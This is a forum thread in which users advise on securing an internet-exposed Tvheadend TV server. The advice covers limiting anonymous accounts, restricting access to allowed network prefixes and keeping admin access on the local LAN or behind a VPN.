Tvheadend

It's not uncommon to see things like this, the amount of unsecured tvh instances running on the net is beyond silly, You were more than likely found on Shodan.

If you must have remote access, create a limited anon account, and I mean limited, use a network prefix and even then only allow access to HTTP for playing channels/epg view!

Mark Clarkstone wrote:

It's not uncommon to see things like this, the amount of unsecured tvh instances running on the net is beyond silly, You were more than likely found on Shodan.

If you must have remote access, create a limited anon account, and I mean limited, use a network prefix and even then only allow access to HTTP for playing channels/epg view!

Network prefix?

Is there a way to limit access for admin to local LAN addresses (which can be accessed remotely via a VPN if required) - and only allow very limited port forwarded access purely for streaming and EPG in Kodi? (The VPN I am running isn't powerful enough to handle HD video in real time - otherwise I'd do it all over a VPN)

Stephen Neal wrote:

Mark Clarkstone wrote:

It's not uncommon to see things like this, the amount of unsecured tvh instances running on the net is beyond silly, You were more than likely found on Shodan.

If you must have remote access, create a limited anon account, and I mean limited, use a network prefix and even then only allow access to HTTP for playing channels/epg view!

Network prefix?

Allowed networks in the "Access Entries -> Users".

Is there a way to limit access for admin to local LAN addresses (which can be accessed remotely via a VPN if required) - and only allow very limited port forwarded access purely for streaming and EPG in Kodi? (The VPN I am running isn't powerful enough to handle HD video in real time - otherwise I'd do it all over a VPN)

I think so, just add another anon account with a different network prefix that has very limited access.

Put the limit one at the top & the admin one at the bottom.